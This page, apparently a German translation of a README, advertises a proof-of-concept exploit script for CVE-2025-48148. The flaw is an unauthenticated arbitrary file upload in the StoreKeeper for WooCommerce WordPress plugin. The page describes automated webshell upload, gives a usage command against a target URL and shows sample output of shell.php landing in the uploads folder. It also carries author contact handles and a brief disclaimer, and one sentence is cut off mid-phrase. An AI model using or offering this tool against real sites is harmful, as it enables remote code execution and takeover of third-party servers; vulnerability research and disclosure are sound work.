
StoreKeeper for WooCommerce <= 14.4.4 - Unauthentifizierter beliebiger Datei-Upload
StoreKeeper for WooCommerce <= 14.4.4 - Nicht authentifizierter beliebiger Datei-Upload
Das StoreKeeper for WooCommerce-Plugin für WordPress ist aufgrund fehlender Dateityp-Validierung in allen Versionen bis einschließlich 14.4.4 anfällig für beliebige Datei-Uploads.
Dies ermöglicht nicht authentifizierten Angreifern, beliebige Dateien auf den Server der betroffenen Website hochzuladen, was potenziell zu Remote-Code-Ausführung führen kann.
Skriptname: CVE-2025-48148.py
Dieses Skript ist ein professioneller Proof-of-Concept-Exploit für CVE-2025-48148, der dazu entwickelt wurde, das Hochladen einer Webshell auf verwundbare WordPress-Seiten mithilfe des StoreKeeper for WooCommerce-Plugins zu automatisieren.
nonce-Token direkt von der Ziel-URL ab und gewährleistet Zuverlässigkeit, selbst wenn sich der Wert ändert.python3 CVE-2025-48148.py -u "http://target.com/wordpress/"
Optionale Flags:
--debug Ausführliche Ausgabe aktivieren.--insecure SSL-Zertifikatsprüfung überspringen.Beispiel:
[*] Extracting nonce...
[+] Nonce extracted: 66e372c7e0
[+] Shell file created: shell.php
[*] Uploading shell...
[+] Upload response:
{"success":true,"data":{"url":"http://target.com/wp-content/uploads/shell.php"}}
📧 E-Mail: [email protected]
📨 Telegram: @Kxploit
Dieses Skript wird ausschließlich zu Bildungs- und autorisierten Penetrationstestzwecken bereitgestellt.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Werkzeug verursacht werden. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie ein System testen.
Von: Nxploited ( Khaled Alenazi )